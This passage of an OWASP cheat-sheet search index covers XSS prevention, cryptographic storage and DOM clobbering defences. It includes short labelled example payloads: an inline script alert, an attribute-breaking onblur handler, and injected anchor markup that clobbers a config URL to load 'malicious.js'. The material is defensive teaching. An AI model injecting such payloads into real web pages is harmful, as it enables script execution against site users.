"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#csrf","title":"CSRF","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","title":"Cross Site Scripting Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance to prevent XSS vulnerabilities.

Cross-Site Scripting (XSS) is a misnomer. The name originated from early versions of the attack where stealing data cross-site was the primary focus. Since then, it has extended to include injection of basically any content, but we still refer to this as XSS. XSS is serious and can lead to account impersonation, observing user behaviour, loading external content, stealing sensitive data, and more.

This cheatsheet is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#framework-security","title":"Framework Security","text":"

Fewer XSS bugs appear in applications built with modern web frameworks. These frameworks steer developers towards good security practices and help mitigate XSS by using templating, auto-escaping, and more. That said, developers need to be aware of problems that can occur when using frameworks insecurely such as:

Understand how your framework prevents XSS and where it has gaps. There will be times where you need to do something outside the protection provided by your framework. This is where Output Encoding and HTML Sanitization are critical. OWASP are producing framework specific cheatsheets for React, Vue, and Angular.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy","title":"XSS Defense Philosophy","text":"

For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised.

However, frameworks aren't perfect and security gaps still exist in popular frameworks like React and Angular. Output Encoding and HTML Sanitization help address those gaps.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Output Encoding is recommended when you need to safely display data exactly as a user typed it in. Variables should not be interpreted as code instead of text. This section covers each form of output encoding, where to use it, and where to avoid using dynamic variables entirely.

Start with using your framework\u2019s default output encoding protection when you wish to display data as the user typed it in. Automatic encoding and escaping functions are built into most frameworks.

If you\u2019re not using a framework or need to cover gaps in the framework then you should use an output encoding library. Each variable used in the user interface should be passed through an output encoding function. A list of output encoding libraries is included in the appendix.

There are many different output encoding methods because browsers parse HTML, JS, URLs, and CSS differently. Using the wrong encoding method may introduce weaknesses or harm the functionality of your application.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-contexts","title":"Output Encoding for \u201cHTML Contexts\u201d","text":"

\u201cHTML Context\u201d refers to inserting a variable between two basic HTML tags like a <div> or <b>. For example..

<div> $varUnsafe </div>\n

An attacker could modify data that is rendered as $varUnsafe. This could lead to an attack being added to a webpage.. for example.

<div> <script>alert`1`</script> </div> // Example Attack\n

In order to add a variable to a HTML context safely, use HTML entity encoding for that variable as you add it to a web template.

Here are some examples of encoded values for specific characters.

If you're using JavaScript for writing to HTML, look at the .textContent attribute as it is a Safe Sink and will automatically HTML Entity Encode.

&    &amp;\n<    &lt;\n>    &gt;\n\"    &quot;\n'    &#x27;\n
"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-attribute-contexts","title":"Output Encoding for \u201cHTML Attribute Contexts\u201d","text":"

\u201cHTML Attribute Contexts\u201d refer to placing a variable in an HTML attribute value. You may want to do this to change a hyperlink, hide an element, add alt-text for an image, or change inline CSS styles. You should apply HTML attribute encoding to variables being placed in most HTML attributes. A list of safe HTML attributes is provided in the Safe Sinks section.

<div attr=\"$varUnsafe\">\n<div attr=\u201d*x\u201d onblur=\u201dalert(1)*\u201d> // Example Attack\n

It\u2019s critical to use quotation marks like \" or ' to surround your variables. Quoting makes it difficult to change the context a variable operates in, which helps prevent XSS. Quoting also significantly reduces the characterset that you need to encode, making your application more reliable and the encoding easier to implement.

If you're using JavaScript for writing to a HTML Attribute, look at the .setAttribute and [attribute] methods which will automatically HTML Attribute Encode. Those are Safe Sinks as long as the attribute name is hardcoded and innocuous, like id or class. Generally, attributes that accept JavaScript, such as onClick, are NOT safe to use with untrusted attribute values.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-javascript-contexts","title":"Output Encoding for \u201cJavaScript Contexts\u201d","text":"

\u201cJavaScript Contexts\u201d refer to placing variables into inline JavaScript which is then embedded in an HTML document. This is commonly seen in programs that heavily use custom JavaScript embedded in their web pages.

The only \u2018safe\u2019 location for placing variables in JavaScript is inside a \u201cquoted data value\u201d. All other contexts are unsafe and you should not place variable data in them.

Examples of \u201cQuoted Data Values\u201d

<script>alert('$varUnsafe\u2019)</script>\n<script>x=\u2019$varUnsafe\u2019</script>\n<div onmouseover=\"'$varUnsafe'\"</div>\n

Encode all characters using the \\xHH format. Encoding libraries often have a EncodeForJavaScript or similar to support this function.

Please look at the OWASP Java Encoder JavaScript encoding examples for examples of proper JavaScript use that requires minimal encoding.

For JSON, verify that the Content-Type header is application/json and not text/html to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-css-contexts","title":"Output Encoding for \u201cCSS Contexts\u201d","text":"

\u201cCSS Contexts\u201d refer to variables placed into inline CSS. This is common when you want users to be able to customize the look and feel of their webpages. CSS is surprisingly powerful and has been used for many types of attacks. Variables should only be placed in a CSS property value. Other \u201cCSS Contexts\u201d are unsafe and you should not place variable data in them.

<style> selector { property : $varUnsafe; } </style>\n<style> selector { property : \"$varUnsafe\"; } </style>\n<span style=\"property : $varUnsafe\">Oh no</span>\n

If you're using JavaScript to change a CSS property, look into using style.property = x. This is a Safe Sink and will automatically CSS encode data in it.

// Add CSS Encoding Advice

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-url-contexts","title":"Output Encoding for \u201cURL Contexts\u201d","text":"

\u201cURL Contexts\u201d refer to variables placed into a URL. Most commonly, a developer will add a parameter or URL fragment to a URL base that is then displayed or used in some operation. Use URL Encoding for these scenarios.

<a href=\"http://www.owasp.org?test=$varUnsafe\">link</a >\n

Encode all characters with the %HH encoding format. Make sure any attributes are fully quoted, same as JS and CSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#common-mistake","title":"Common Mistake","text":"

There will be situations where you use a URL in different contexts. The most common one would be adding it to an href or src attribute of an <a> tag. In these scenarios, you should do URL encoding, followed by HTML attribute encoding.

url = \"https://site.com?data=\" + urlencode(parameter)\n<a href='attributeEncode(url)'>link</a>\n

If you're using JavaScript to construct a URL Query Value, look into using window.encodeURIComponent(x). This is a Safe Sink and will automatically URL encode data in it.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts","title":"Dangerous Contexts","text":"

Output encoding is not perfect. It will not always prevent XSS. These locations are known as dangerous contexts. Dangerous contexts include:

<script>Directly in a script</script>\n<!-- Inside an HTML comment -->\n<style>Directly in CSS</style>\n<div ToDefineAnAttribute=test />\n<ToDefineATag href=\"/test\" />\n

Other areas to be careful of include:

Don't place variables into dangerous contexts as even with output encoding, it will not prevent an XSS attack fully.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#html-sanitization","title":"HTML Sanitization","text":"

Sometimes users need to author HTML. One scenario would be allow users to change the styling or structure of content inside a WYSIWYG editor. Output encoding here will prevent XSS, but it will break the intended functionality of the application. The styling will not be rendered. In these cases, HTML Sanitization should be used.

HTML Sanitization will strip dangerous HTML from a variable and return a safe string of HTML. OWASP recommends DOMPurify for HTML Sanitization.

let clean = DOMPurify.sanitize(dirty);\n

There are some further things to consider:

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#safe-sinks","title":"Safe Sinks","text":"

Security professionals often talk in terms of sources and sinks. If you pollute a river, it'll flow downstream somewhere. It\u2019s the same with computer security. XSS sinks are places where variables are placed into your webpage.

Thankfully, many sinks where variables can be placed are safe. This is because these sinks treat the variable as text and will never execute it. Try to refactor your code to remove references to unsafe sinks like innerHTML, and instead use textContent or value.

elem.textContent = dangerVariable;\nelem.insertAdjacentText(dangerVariable);\nelem.className = dangerVariable;\nelem.setAttribute(safeName, dangerVariable);\nformfield.value = dangerVariable;\ndocument.createTextNode(dangerVariable);\ndocument.createElement(dangerVariable);\nelem.innerHTML = DOMPurify.sanitize(dangerVar);\n

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

For a comprehensive list, check out the DOMPurify allowlist

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#other-controls","title":"Other Controls","text":"

Framework Security Protections, Output Encoding, and HTML Sanitization will provide the best protection for your application. OWASP recommends these in all circumstances.

Consider adopting the following controls in addition to the above.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-prevention-rules-summary","title":"XSS Prevention Rules Summary","text":"

The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.

Data Type Context Code Sample Defense String HTML Body <span>UNTRUSTED DATA </span> HTML Entity Encoding (rule #1). String Safe HTML Attributes <input type=\"text\" name=\"fname\" value=\"UNTRUSTED DATA \"> Aggressive HTML Entity Encoding (rule #2), Only place untrusted data into a list of safe attributes (listed below), Strictly validate unsafe attributes such as background, ID and name. String GET Parameter <a href=\"/site/search?value=UNTRUSTED DATA \">clickme</a> URL Encoding (rule #5). String Untrusted URL in a SRC or HREF attribute <a href=\"UNTRUSTED URL \">clickme</a> <iframe src=\"UNTRUSTED URL \" /> Canonicalize input, URL Validation, Safe URL verification, Allow-list http and HTTPS URLs only (Avoid the JavaScript Protocol to Open a new Window), Attribute encoder. String CSS Value HTML <div style=\"width: UNTRUSTED DATA ;\">Selection</div> Strict structural validation (rule #4), CSS Hex encoding, Good design of CSS Features. String JavaScript Variable <script>var currentValue='UNTRUSTED DATA ';</script> <script>someFunction('UNTRUSTED DATA ');</script> Ensure JavaScript variables are quoted, JavaScript Hex Encoding, JavaScript Unicode Encoding, Avoid backslash encoding (\\\" or \\' or \\\\). HTML HTML Body <div>UNTRUSTED HTML</div> HTML Validation (JSoup, AntiSamy, HTML Sanitizer...). String DOM XSS <script>document.write(\"UNTRUSTED INPUT: \" + document.location.hash );<script/> DOM based XSS Prevention Cheat Sheet"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary","title":"Output Encoding Rules Summary","text":"

The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. The following charts details a list of critical output encoding methods needed to stop Cross Site Scripting.

Encoding Type Encoding Mechanism HTML Entity Encoding Convert & to &amp;, Convert < to &lt;, Convert > to &gt;, Convert \" to &quot;, Convert ' to &#x27; HTML Attribute Encoding Except for alphanumeric characters, encode all characters with the HTML Entity &#xHH; format, including spaces. (HH = Hex Value) URL Encoding Standard percent encoding, see here. URL encoding should only be used to encode parameter values, not the entire URL or path fragments of a URL. JavaScript Encoding Except for alphanumeric characters, encode all characters with the \\uXXXX unicode encoding format (X = Integer). CSS Hex Encoding CSS encoding supports \\XX and \\XXXXXX. Using a two character encode can cause problems if the next character continues the encode sequence. There are two solutions: (a) Add a space after the CSS encode (will be ignored by the CSS parser) (b) use the full amount of CSS encoding possible by zero padding the value."},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

XSS Attack Cheat Sheet:

The following article describes how to exploit different kinds of XSS Vulnerabilities that this article was created to help you avoid:

Description of XSS Vulnerabilities:

Discussion on the Types of XSS Vulnerabilities:

How to Review Code for Cross-site scripting Vulnerabilities:

How to Test for Cross-site scripting Vulnerabilities:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html","title":"Cryptographic Storage Cheat Sheet","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article provides a simple model to follow when implementing solutions to protect data at rest.

Passwords should not be stored using reversible encryption - secure password hashing algorithms should be used instead. The Password Storage Cheat Sheet contains further guidance on storing passwords.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#architectural-design","title":"Architectural Design","text":"

The first step in designing any application is to consider the overall architecture of the system, as this will have a huge impact on the technical implementation.

This process should begin with considering the threat model of the application (i.e, who you are trying to protect that data against).

The use of dedicated secret or key management systems can provide an additional layer of security protection, as well as making the management of secrets significantly easier - however it comes at the cost of additional complexity and administrative overhead - so may not be feasible for all applications. Note that many cloud environments provide these services, so these should be taken advantage of where possible. The Secrets Management Cheat Sheet contains further guidance on this topic.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#where-to-perform-encryption","title":"Where to Perform Encryption","text":"

Encryption can be performed on a number of levels in the application stack, such as:

Which layer(s) are most appropriate will depend on the threat model. For example, hardware level encryption is effective at protecting against the physical theft of the server, but will provide no protection if an attacker is able to compromise the server remotely.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#minimise-the-storage-of-sensitive-information","title":"Minimise the Storage of Sensitive Information","text":"

The best way to protect sensitive information is to not store it in the first place. Although this applies to all kinds of information, it is most often applicable to credit card details, as they are highly desirable for attackers, and PCI DSS has such stringent requirements for how they must be stored. Wherever possible, the storage of sensitive information should be avoided.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms","title":"Algorithms","text":"

For symmetric encryption AES with a key that's at least 128 bits (ideally 256 bits) and a secure mode should be used as the preferred algorithm.

For asymmetric encryption, use elliptical curve cryptography (ECC) with a secure curve such as Curve25519 as a preferred algorithm. If ECC is not available and RSA must be used, then ensure that the key is at least 2048 bits.

Many other symmetric and asymmetric algorithms are available which have their own pros and cons, and they may be better or worse than AES or Curve25519 in specific use cases. When considering these, a number of factors should be taken into account, including:

In some cases there may be regulatory requirements that limit the algorithms that can be used, such as FIPS 140-2 or PCI DSS.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms","title":"Custom Algorithms","text":"

Don't do this.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#cipher-modes","title":"Cipher Modes","text":"

There are various modes that can be used to allow block ciphers (such as AES) to encrypt arbitrary amounts of data, in the same way that a stream cipher would. These modes have different security and performance characteristics, and a full discussion of them is outside the scope of this cheat sheet. Some of the modes have requirements to generate secure initialisation vectors (IVs) and other attributes, but these should be handled automatically by the library.

Where available, authenticated modes should always be used. These provide guarantees of the integrity and authenticity of the data, as well as confidentiality. The most commonly used authenticated modes are GCM and CCM, which should be used as a first preference.

If GCM or CCM are not available, then CTR mode or CBC mode should be used. As these do not provide any guarantees about the authenticity of the data, separate authentication should be implemented, such as using the Encrypt-then-MAC technique. Care needs to be taken when using this method with variable length messages

ECB should not be used outside of very specific circumstances.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#random-padding","title":"Random Padding","text":"

For RSA, it is essential to enable Random Padding. Random Padding is also known as OAEP or Optimal Asymmetric Encryption Padding. This class of defense protects against Known Plain Text Attacks by adding randomness at the beginning of the payload.

The Padding Schema of PKCS#1 is typically used in this case.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation","title":"Secure Random Number Generation","text":"

Random numbers (or strings) are needed for various security critical functionality, such as generating encryption keys, IVs, session IDs, CSRF tokens or password reset tokens. As such, it is important that these are generated securely, and that it is not possible for an attacker to guess and predict them.

It is generally not possible for computers to generate truly random numbers (without special hardware), so most systems and languages provide two different types of randomness.

Pseudo-Random Number Generators (PRNG) provide low-quality randomness that are much faster, and can be used for non-security related functionality (such as ordering results on a page, or randomising UI elements). However, they must not be used for anything security critical, as it is often possible for attackers to guess or predict the output.

Cryptographically Secure Pseudo-Random Number Generators (CSPRNG) are designed to produce a much higher quality of randomness (more strictly, a greater amount of entropy), making them safe to use for security-sensitive functionality. However, they are slower and more CPU intensive, can end up blocking in some circumstances when large amounts of random data are requested. As such, if large amounts of non-security related randomness are needed, they may not be appropriate.

The table below shows the recommended algorithms for each language, as well as insecure functions that should not be used.

Language Unsafe Functions Cryptographically Secure Functions C random(), rand() getrandom(2) Java java.util.Random() java.security.SecureRandom PHP rand(), mt_rand(), array_rand(), uniqid() random_bytes(), random_int() in PHP 7 or openssl_random_pseudo_bytes() in PHP 5 .NET/C# Random() RandomNumberGenerator Objective-C arc4random() (Uses RC4 Cipher) SecRandomCopyBytes Python random() secrets() Ruby Random SecureRandom Go rand using math/rand package crypto.rand package Rust rand::prng::XorShiftRng rand::prng::chacha::ChaChaRng and the rest of the Rust library CSPRNGs. Node.js Math.random() crypto.randomBytes, crypto.randomInt, crypto.randomUUID"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#uuids-and-guids","title":"UUIDs and GUIDs","text":"

Universally unique identifiers (UUIDs or GUIDs) are sometimes used as a quick way to generate random strings. Although they can provide a reasonable source of randomness, this will depend on the type or version of the UUID that is created.

Specifically, version 1 UUIDs are comprised of a high precision timestamp and the MAC address of the system that generated them, so are not random (although they may be hard to guess, given the timestamp is to the nearest 100ns). Type 4 UUIDs are randomly generated, although whether this is done using a CSPRNG will depend on the implementation. Unless this is known to be secure in the specific language or framework, the randomness of UUIDs should not be relied upon.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#defence-in-depth","title":"Defence in Depth","text":"

Applications should be designed to still be secure even if cryptographic controls fail. Any information that is stored in an encrypted form should also be protected by additional layers of security. Application should also not rely on the security of encrypted URL parameters, and should enforce strong access control to prevent unauthorised access to information.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-management","title":"Key Management","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#processes","title":"Processes","text":"

Formal processes should be implemented (and tested) to cover all aspects of key management, including:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-generation","title":"Key Generation","text":"

Keys should be randomly generated using a cryptographically secure function, such as those discussed in the Secure Random Number Generation section. Keys should not be based on common words or phrases, or on \"random\" characters generated by mashing the keyboard.

Where multiple keys are used (such as data separate data-encrypting and key-encrypting keys), they should be fully independent from each other.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-lifetimes-and-rotation","title":"Key Lifetimes and Rotation","text":"

Encryption keys should be changed (or rotated) based on a number of different criteria:

Once one of these criteria have been met, a new key should be generated and used for encrypting any new data. There are two main approaches for how existing data that was encrypted with the old key(s) should be handled:

  1. Decrypting it and re-encrypting it with the new key.
  2. Marking each item with the ID of the key that was used to encrypt it, and storing multiple keys to allow the old data to be decrypted.

The first option should generally be preferred, as it greatly simplifies both the application code and key management processes; however, it may not always be feasible. Note that old keys should generally be stored for a certain period after they have been retired, in case old backups of copies of the data need to be decrypted.

It is important that the code and processes required to rotate a key are in place before they are required, so that keys can be quickly rotated in the event of a compromise. Additionally, processes should also be implemented to allow the encryption algorithm or library to be changed, in case a new vulnerability is found in the algorithm or implementation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-storage","title":"Key Storage","text":"

Securely storing cryptographic keys is one of the hardest problems to solve, as the application always needs to have some level of access to the keys in order to decrypt the data. While it may not be possible to fully protect the keys from an attacker who has fully compromised the application, a number of steps can be taken to make it harder for them to obtain the keys.

Where available, the secure storage mechanisms provided by the operating system, framework or cloud service provider should be used. These include:

There are many advantages to using these types of secure storage over simply putting keys in configuration files. The specifics of these will vary depending on the solution used, but they include:

In some cases none of these will be available, such as in a shared hosting environment, meaning that it is not possible to obtain a high degree of protection for any encryption keys. However, the following basic rules can still be followed:

The Secrets Management Cheat Sheet provides more details on securely storing secrets.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#separation-of-keys-and-data","title":"Separation of Keys and Data","text":"

Where possible, encryption keys should be stored in a separate location from encrypted data. For example, if the data is stored in a database, the keys should be stored in the filesystem. This means that if an attacker only has access to one of these (for example through directory traversal or SQL injection), they cannot access both the keys and the data.

Depending on the architecture of the environment, it may be possible to store the keys and data on separate systems, which would provide a greater degree of isolation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#encrypting-stored-keys","title":"Encrypting Stored Keys","text":"

Where possible, encryption keys should themselves be stored in an encrypted form. At least two separate keys are required for this:

For this to be effective, the KEK must be stored separately from the DEK. The encrypted DEK can be stored with the data, but will only be usable if an attacker is able to also obtain the KEK, which is stored on another system.

The KEK should also be at least as strong as the DEK. The envelope encryption guidance from Google contains further details on how to manage DEKs and KEKs.

In simpler application architectures (such as shared hosting environments) where the KEK and DEK cannot be stored separately, there is limited value to this approach, as an attacker is likely to be able to obtain both of the keys at the same time. However, it can provide an additional barrier to unskilled attackers.

A key derivation function (KDF) could be used to generate a KEK from user-supplied input (such a passphrase), which would then be used to encrypt a randomly generated DEK. This allows the KEK to be easily changed (when the user changes their passphrase), without needing to re-encrypt the data (as the DEK remains the same).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html","title":"DOM Clobbering Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

DOM Clobbering is a type of code-reuse, HTML-only injection attack, where attackers confuse a web application by injecting HTML elements whose id or name attribute matches the name of security-sensitive variables or browser APIs, such as variables used for fetching remote content (e.g., script src), and overshadow their value.

It is particularly relevant when script injection is not possible, e.g., when filtered by HTML sanitizers, or mitigated by disallowing or controlling script execution. In these scenarios, attackers may still inject non-script HTML markups into webpages and transform the initially secure markup into executable code, achieving Cross-Site Scripting (XSS).

This cheat sheet is a list of guidelines, secure coding patterns, and practices to prevent or restrict the impact of DOM Clobbering in your web application.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#background","title":"Background","text":"

Before we dive into DOM Clobbering, let's refresh our knowledge with some basic Web background.

When a webpage is loaded, the browser creates a DOM tree that represents the structure and content of the page, and JavaScript code has read and write access to this tree.

When creating the DOM tree, browsers also create an attribute for (some) named HTML elements on window and document objects. Named HTML elements are those having an id or name attribute. For example, the markup:

<form id=x></a>\n

will lead to browsers creating references to that form element with the attribute x of window and document:

var obj1 = document.getElementById('x');\nvar obj2 = document.x;\nvar obj3 = document.x;\nvar obj4 = window.x;\nvar obj5 = x; // by default, objects belong to the global Window, so x is same as window.x\nconsole.log(\nobj1 === obj2 && obj2 === obj3 &&\nobj3 === obj4 && obj4 === obj5\n); // true\n

When accessing an attribute of window and document objects, named HTML element references come before lookups of built-in APIs and other attributes on window and document that developers have defined, also known as named property accesses. Developers unaware of such behavior may use the content of window/document attributes for sensitive operations, such as URLs for fetching remote content, and attackers can exploit it by injecting markups with colliding names. Similarly to custom attributes/variables, built-in browser APIs may be overshadowed by DOM Clobbering.

If attackers are able to inject (non-script) HTML markup in the DOM tree, it can change the value of a variable that the web application relies on due to named property accesses, causing it to malfunction, expose sensitive data, or execute attacker-controlled scripts. DOM Clobbering works by taking advantage of this (legacy) behaviour, causing a namespace collision between the execution environment (i.e., window and document objects), and JavaScript code.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-1","title":"Example Attack 1","text":"
let redirectTo = window.redirectTo || '/profile/';\nlocation.assign(redirectTo);\n

The attacker can:

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-2","title":"Example Attack 2","text":"
var script = document.createElement('script');\nlet src = window.config.url || 'script.js';\ns.src = src;\ndocument.body.appendChild(s);\n

The attacker can inject the markup <a id=config><a id=config name=url href='malicious.js'> to load additional JavaScript code, and obtain arbitrary client-side code execution.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#summary-of-guidelines","title":"Summary of Guidelines","text":"

For quick reference, below is the summary of guidelines discussed next.

Guidelines Description # 1 Use HTML Sanitizers link # 2 Use Content-Security Policy link # 3 Freeze Sensitive DOM Objects link # 4 Validate All Inputs to DOM Tree link # 5 Use Explicit Variable Declarations link # 6 Do Not Use Document and Window for Global Variables link # 7 Do Not Trust Document Built-in APIs Before Validation link # 8 Enforce Type Checking link # 9 Use Strict Mode link # 10 Apply Browser Feature Detection link # 11 Limit Variables to Local Scope link # 12 Use Unique Variable Names In Production link # 13 Use Object-oriented Programming Techniques like Encapsulation link"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#mitigation-techniques","title":"Mitigation Techniques","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#1-html-sanitization","title":"#1: HTML Sanitization","text":"

Robust HTML sanitizers can prevent or restrict the risk of DOM Clobbering. They can do so in multiple ways. For example:

OWASP recommends DOMPurify or the Sanitizer API for HTML sanitization.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#dompurify-sanitizer","title":"DOMPurify Sanitizer","text":"

By default, DOMPurify removes all clobbering collisions with built-in APIs and properties (using the enabled-by-default SANITIZE_DOM configuration option). ]

To be protected against clobbering of custom variables and properties as well, you need to enable the SANITIZE_NAMED_PROPS config:

var clean = DOMPurify.sanitize(dirty, {SANITIZE_NAMED_PROPS: true});\n

This would isolate the namespace of named properties and JavaScript variables by prefixing them with user-content- string.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#sanitizer-api","title":"Sanitizer API","text":"

The new browser-built-in Sanitizer API does not prevent DOM Clobbering it its default setting, but can be configured to remove named properties:

const sanitizerInstance = new Sanitizer({\nblockAttributes: [\n{'name': 'id', elements: '*'},\n{'name': 'name', elements: '*'}\n]\n});\ncontainerDOMElement.setHTML(input, {sanitizer: sanitizerInstance});\n
"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#2-content-security-policy","title":"#2: Content-Security Policy","text":"

Content-Security Policy (CSP) is a set of rules that tell the browser which resources are allowed to be loaded on a web page. By restricting the sources of JavaScript files (e.g., with the script-src directive), CSP can prevent malicious code from being injected into the page.

Note: CSP can only mitigate some varints of DOM clobbering attacks, such as when attackers attempt to load new scripts by clobbering script sources, but not when already-present code can be abused for code execution, e.g., clobbering the parameters of code evaluation constructs like eval().

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#3-freezing-sensitive-dom-objects","title":"#3: Freezing Sensitive DOM Objects","text":"

A simple way to mitigate DOM Clobbering against individual objects could be to freeze sensitive DOM objects and their properties, e.g., via Object.freeze() method.

Note: Freezing object properties prevents them from being overwritten by named DOM elements. But, determining all objects and object properties that need to be frozen may be not be easy, limiting the usefulness of this approach.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#secure-coding-guidelines","title":"Secure Coding Guidelines","text":"

DOM Clobbering can be avoided by defensive programming and adhering to a few coding patterns and guidelines.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#4-validate-all-inputs-to-dom-tree","title":"#4: Validate All Inputs to DOM Tree","text":"

Before inserting any markup into the webpage's DOM tree, sanitize id and name attributes (see HTML sanitization).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#5-use-explicit-variable-declarations","title":"#5: Use Explicit Variable Declarations","text":"

When initializing varibles, always use a variable declarator like var, let or const, which prevents clobbering of the variable.

Note: Declaring a variable with let does not create a property on window, unlike var. Therefore, window.VARNAME can still be clobbered (assuming VARNAME is the name of the variable).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#6-do-not-use-document-and-window-for-global-variables","title":"#6: Do Not Use Document and Window for Global Variables","text":"

Avoid using objects like document and window for storing global variables, because they can be easily manipulated. (see, e.g., here).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#7-do-not-trust-document-built-in-apis-before-validation","title":"#7: Do Not Trust Document Built-in APIs Before Validation","text":"

Document properties, including built-in ones, are always overshadowed by DOM Clobbering, even right after they are assigned a value.

Hint: This is due to the so-called named property visibility algorithm, where named HTML element references come before lookups of built-in APIs and other attributes on document.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#8-enforce-type-checking","title":"#8: Enforce Type Checking","text":"

Always check the type of Document and Window properties before using them in sensitive operations, e.g., using the instance of operator.

Hint: When an object is clobbered, it would refer to an HTMLElement instance, which may not be the expected type.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#9-use-strict-mode","title":"#9: Use Strict Mode","text":"

Use strict mode to prevent unintended global variable creation, and to raise an error when read-only properties are attempted to be over-written.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#10-apply-browser-feature-detection","title":"#10: Apply Browser Feature Detection","text":"

Instead of relying on browser-specific features or properties, use feature detection to determine whether a feature is supported before using it. This can help prevent errors and DOM Clobberng that might arise when using those features in unsupported browsers.

Hint: Unsupported feature APIs can act as an undefined variable/property in unsupported browsers, making them clobberable.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#11-limit-variables-to-local-scope","title":"#11: Limit Variables to Local Scope","text":"

